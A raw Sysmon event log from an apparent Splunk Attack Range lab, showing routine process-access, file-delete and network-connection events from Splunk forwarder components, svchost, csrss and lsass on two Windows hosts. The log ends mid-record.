11:21:03.725{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.725{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.725{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.725{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-189F-6216-4E07-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.725{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-189F-6216-4E07-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.727{C8EA50B7-189F-6216-4E07-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.156{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2C055FDACE8D3915625A31D88D349E7,SHA256=BBDD4748884D94859ECDE60ACE64B43190FECAD296AB166CB1E2CC2619D43AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:04.716{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63CB35B2170D79A9C4F325334EBDB2F1,SHA256=150FE953A7B29EAF66C15DFAD5C2045BFF5A33B89B0222BB861AA6B56D1814EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:04.195{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2719D04E0B674A78CBB976DF81EEC38C,SHA256=A874ADA791F3341DA21F3423ED7E68EF1B31AA7062BC9FC34CDBCD55267266A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:05.732{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CCADE525B7E073D12C582B8736777AA,SHA256=B043B82B5B7EB9AEAFA9AE19D39510024B677FCF70063E00203F6D6BB6CF9324,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:05.226{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D302DA4360D6EE1D9D163D1EE3696339,SHA256=9910D1B0409BFF8FB2E68E4139C86A3F918B8F6D187ED40CF365E8868E82038A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:03.654{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51697-false10.0.1.12-8000- 23542300x8000000000000000222152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:06.747{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4FEACDF514680F0293040D1E24750C0,SHA256=532807A6EF91ABE574DF2B2EE5787C06E320DF2F581E55415233DFF3BA5B0AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:06.256{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=318469A6E3DD745A1DEFAFC1D24FB077,SHA256=2537D01B6BB93C0B97FD0C7C5F0A080BE91B2285846408BD38E8F4203E463C02,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.523{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49519-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.523{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49519-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000222153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:07.778{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD49F30A709BBC4E9DBA786A8340E29,SHA256=A3F0C98727C552EE10A6C9979249839C162AFE36B24BC09A7316723A2FD11A37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:07.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25EA3A7D00390662A77F2855DB108B9D,SHA256=2113E7D0EA76CB7DE111BD61147A41285DBCD8D9A058EB5649B1A65D889B70DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:08.810{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C159B69308582E70B89BC2253315AEA,SHA256=292014B0656680FA7703BBE48E806E913DD816071B0477CDDBCB49D70E6CD114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:08.291{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5341E5A54274973958FA40DE9A40A3BF,SHA256=7FFC9B7B514E9A3D5418EE3BAD3AE3331232A199DAC7E537BCAB6DB555D4AE85,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:05.674{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49520-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:09.903{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F043C2F7894637D4CC5A46B9C943CA5,SHA256=825E4235292E4CC3CF764A0C39E8E44398B61E27F461848C1CC1276CED1E7EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:09.308{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=610C1A6C7AA86A4DFE61A6F8B1D32984,SHA256=F162363209617899DAE440F9A430AF5B176D66E586494DA32A2D6ACEADAD9EF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:10.919{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EF384EEC5F9FD5E761E917A8C985600,SHA256=8B145CAA884417CEB31C96B4A0481B94A34ECC543051332B13C00C16FBEAD3B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:10.323{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FDD087F1DA485D3AA9D0A5D9BDA3382,SHA256=9D2A467F610C06DB420F749BF3DBA2322038ADC09801C28F44FAA08522EF1016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:11.981{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=868F6BCDB50D4AD6A96270A54677067E,SHA256=6EAC5B850B699385566FC39E6E2EE4C1A4A65DB284229A6F00BC18B3DA1A6619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:11.389{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=767A3EE279F29223A3EB6202335AF4BE,SHA256=4480BBEF5F03A58D82E6B35700C99B9386058F0B214F8DD8FF67EACFD7DF8A41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:09.608{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51698-false10.0.1.12-8000- 23542300x8000000000000000298313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:12.408{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=292E5AE76787193470721109938D5470,SHA256=E976727DD16142A439F9E777E36C6BC43BA5971956F1036CF315271963ABD5C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:13.423{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA9E4D61233FEC103999C9AF21A8351,SHA256=297E57CB5F43BC39A49840CA2DED33DE2A36F76A29F7323539BC3A44B252927B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:13.028{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07F621DF23FB50A31F7CD14710E0D2E5,SHA256=6769267A5BAF4D02DD8C88BE0BE0E03B0749F49CA1F11F6744DA8858624D0987,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:14.470{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EFC69229DB568FD5100A5D067D35F64,SHA256=E9B21622058F0171F88E8B55F93C796609080C20154EBB96E7F8FFC516C0A902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:14.044{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADB48D37F96DF58A9254DB41330CC0CB,SHA256=3862AACE65DEF86CBEE488CE4BEC95B01AE8DC3688B57FDB2B102C0224826345,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:11.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49521-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:15.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27664D1FCF3F53B9A1595D1BF21FEFF6,SHA256=1262303169933AEC9FB910056EE55A8821522D2149CFDF38982919B934D4843F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:15.044{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F778FE8167C10A36B1C766CC568EC106,SHA256=AAA316F2C7ECB6571CD7733999A440C561A9B5B3F42D1A444D2020E4F5AC7002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:16.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13BAAA9E3CC80400B75B4841B62DC47,SHA256=CEC4267EB29FC4736B63B465368A5B3F2622D957A8E9D9C5B4B7CB0897997145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:16.060{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D5F03FB8450D40D17E133D8828189B,SHA256=829B999A023245C292DECFA78762DCEADD811F29B0AA7841CAC9A095DAACA00D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:17.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D266A02E619E7AA3041462E60DC87A,SHA256=2DD12EB574C65905A406F7B4EFA6AE3C98376888E09D8FF3E0FEA2897FDA90A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:17.185{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20EB501C0F11F9B4637882520FA26C2B,SHA256=72AA1235D075F13880D621B8ECBDD9BBCD4D17303A0F82C68ED8AB1281A0A923,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:14.654{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51699-false10.0.1.12-8000- 23542300x8000000000000000298320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:18.572{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DCD0FC1851DD8641C3F875662EA42D6,SHA256=57D0954961B9F98837CF54D3077BE7B365CF45939B62117F187630798629F69A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:18.419{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=929F112F7634171EE1A4AECEAFD365D4,SHA256=1EB55ADC22B92040987026825D69A3A10BDD99239C281FC6D17987ADF60BBF9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:19.653{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=003164D41ADAD06E79443A661B8AE06C,SHA256=D1B08B9C58CEC4E869A0C1CEF894F6861DBB6DCC3A410D039E278D77DCCD9186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.593{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73BD3644DE75DCD9B61A9AF9BA25FD66,SHA256=8BC1839C7F2E2D3A0CBCBEC94E6BA49602E09E21468AFBD67286CB95B8B5D5E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.524{C8EA50B7-18AF-6216-4F07-000000003802}60807068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program 